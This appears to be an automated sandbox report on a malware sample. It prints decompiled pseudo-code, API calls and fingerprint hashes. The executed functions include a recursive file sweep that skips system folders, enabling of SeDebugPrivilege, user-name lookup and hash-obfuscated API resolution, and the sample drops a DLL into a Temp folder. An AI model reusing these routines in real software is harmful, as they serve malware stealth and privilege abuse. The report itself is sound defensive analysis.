                        • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                        0x00402bf8
                        0x00402c12
                        0x00402c18
                        0x00402c22
                        0x00402c28
                        0x00402c2e
                        0x00402c3f
                        0x00402c48
                        0x00000000
                        0x00402c4d
                        0x00402c54
                        0x00402c1a
                        0x00402c21
                        0x00402c21
                        0x00402bfa
                        0x00402bfa
                        0x00402c01
                        0x00402c04
                        0x00402c04
                        0x00402c0a
                        0x00402c11
                        0x00402c11

                        APIs
                        • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                        • GetTickCount.KERNEL32 ref: 00402C22
                        • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                        • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                        • String ID:
                        • API String ID: 2102729457-0
                        • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                        • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                        • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                        • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                        0x00404de0
                        0x00404e05
                        0x00404e25
                        0x00404e28
                        0x00404e2b
                        0x00404e42
                        0x00404e48
                        0x00404e4f
                        0x00404e56
                        0x00404e5d
                        0x00404e62
                        0x00404e68
                        0x00000000
                        0x00404e78
                        0x00404e12
                        0x00404e65
                        0x00404e65
                        0x00000000
                        0x00404e65
                        0x00404e1e
                        0x00404e20
                        0x00000000
                        0x00404e20
                        0x00404de6
                        0x00000000
                        0x00000000
                        0x00404ded
                        0x00000000

                        APIs
                        • IsWindowVisible.USER32(?), ref: 00404E0A
                        • CallWindowProcA.USER32 ref: 00404E78
                          • Part of subcall function 00403EA0: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                        • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                        • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                        • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                        0x004024f1
                        0x004024f1
                        0x004024f4
                        0x0040250f
                        0x004024f6
                        0x004024f8
                        0x004024fd
                        0x00402504
                        0x00402516
                        0x0040268f
                        0x0040268f
                        0x0040251c
                        0x0040252e
                        0x004015a6
                        0x004015a8
                        0x00000000
                        0x004015ae
                        0x004015a8
                        0x004028c1
                        0x004028cd

                        APIs
                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                        Strings
                        • C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll, xrefs: 004024FD, 00402522
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileWritelstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll
                        • API String ID: 427699356-1918283908
                        • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                        • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                        • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                        • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                        0x00405401
                        0x0040541d
                        0x00405425
                        0x0040542a
                        0x00000000
                        0x00405430
                        0x00405434

                        APIs
                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                        • CloseHandle.KERNEL32(?), ref: 0040542A
                        Strings
                        • Error launching installer, xrefs: 0040540B
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID: Error launching installer
                        • API String ID: 3712363035-66219284
                        • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                        • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                        • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                        • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                        0x00403557
                        0x0040355f
                        0x00403566
                        0x00403569
                        0x00403569
                        0x0040356b
                        0x00403570
                        0x00403577
                        0x0040357d
                        0x00403581
                        0x00403582
                        0x0040358a

                        APIs
                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                        • GlobalFree.KERNEL32 ref: 00403577
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Free$GlobalLibrary
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 1100898210-3936084776
                        • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                        • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                        • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                        • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                        0x004056d3
                        0x004056dd
                        0x004056df
                        0x004056e6
                        0x004056ee
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004056ee
                        0x004056f0
                        0x004056f5

                        APIs
                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\aZOmps0Ug8.exe,C:\Users\user\Desktop\aZOmps0Ug8.exe,80000000,00000003), ref: 004056D8
                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\aZOmps0Ug8.exe,C:\Users\user\Desktop\aZOmps0Ug8.exe,80000000,00000003), ref: 004056E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharPrevlstrlen
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 2709904686-3125694417
                        • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                        • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                        • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                        • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                        0x004057f0
                        0x004057f2
                        0x0040581a
                        0x004057ff
                        0x00405804
                        0x0040580f
                        0x00000000
                        0x0040582c
                        0x00405818
                        0x00405818
                        0x00000000

                        APIs
                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                        • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                        • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                        • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: aZOmps0Ug8.exe PID: 3980 Parent PID: 6780 aZOmps0Ug8.exeCOMMON

                        Executed Functions

                        Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                        0x00403d82
                        0x00403d88
                        0x00403d8c
                        0x00403d8d
                        0x00403d90
                        0x00403ea9
                        0x00403ea9
                        0x00403eb9
                        0x00403ebb
                        0x00403ec0
                        0x00403f95
                        0x00403f95
                        0x00000000
                        0x00403f95
                        0x00403ece
                        0x00403edb
                        0x00403edd
                        0x00403ee2
                        0x00403f8e
                        0x00403f8f
                        0x00000000
                        0x00403f94
                        0x00000000
                        0x00403ee8
                        0x00403ef8
                        0x00403f0a
                        0x00403f12
                        0x00403f18
                        0x00403f26
                        0x00403f28
                        0x00403f2d
                        0x00000000
                        0x00000000
                        0x00403f33
                        0x00403f76
                        0x00403f7c
                        0x00000000
                        0x00403f83
                        0x00403f36
                        0x00403f3a
                        0x00000000
                        0x00403f40
                        0x00403f0c
                        0x00403f10
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403f41
                        0x00403f41
                        0x00403f4b
                        0x00403f58
                        0x00403f5c
                        0x00403f88
                        0x00000000
                        0x00403f8d
                        0x00403f60
                        0x00000000
                        0x00403f60
                        0x00403ef8
                        0x00403ee8
                        0x00403da3
                        0x00403da9
                        0x00403ea6
                        0x00403ea8
                        0x00000000
                        0x00403ea8
                        0x00403db7
                        0x00403dc4
                        0x00403dc6
                        0x00403dcb
                        0x00403e9d
                        0x00403e9e
                        0x00403ea4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403dd1
                        0x00403dd1
                        0x00403dd8
                        0x00000000
                        0x00000000
                        0x00403de2
                        0x00403e12
                        0x00403e22
                        0x00403e30
                        0x00403e36
                        0x00403e3f
                        0x00403e44
                        0x00403e47
                        0x00403e4a
                        0x00403e4c
                        0x00000000
                        0x00000000
                        0x00403e63
                        0x00403e65
                        0x00403e6a
                        0x00403e6f
                        0x00403f64
                        0x00403f6a
                        0x00000000
                        0x00403f71
                        0x00000000
                        0x00403e6f
                        0x00403e26
                        0x00403e27
                        0x00403e2e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e2e
                        0x00403dea
                        0x00403df9
                        0x00000000
                        0x00000000
                        0x00403e01
                        0x00403e10
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e75
                        0x00403e7f
                        0x00403e8c
                        0x00403e8e
                        0x00403e97
                        0x00000000

                        APIs
                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNext
                        • String ID: %s\%s$%s\*$Program Files$Windows
                        • API String ID: 1690352074-2009209621
                        • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                        • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                        • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                        • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                        0x00406512
                        0x00406514
                        0x00406522
                        0x00406524
                        0x00406530
                        0x00406534
                        0x0040653f
                        0x0040654e
                        0x00406552
                        0x0040655a
                        0x0040655f
                        0x0040656d
                        0x00406570
                        0x00406573
                        0x0040657a
                        0x00406589
                        0x0040658d
                        0x00406590
                        0x00406594
                        0x00000000
                        0x0040659a
                        0x004065a1

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                        • String ID: SeDebugPrivilege
                        • API String ID: 3615134276-2896544425
                        • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                        • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                        • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                        • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                        0x00406077
                        0x00406082
                        0x00406085

                        APIs
                        • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
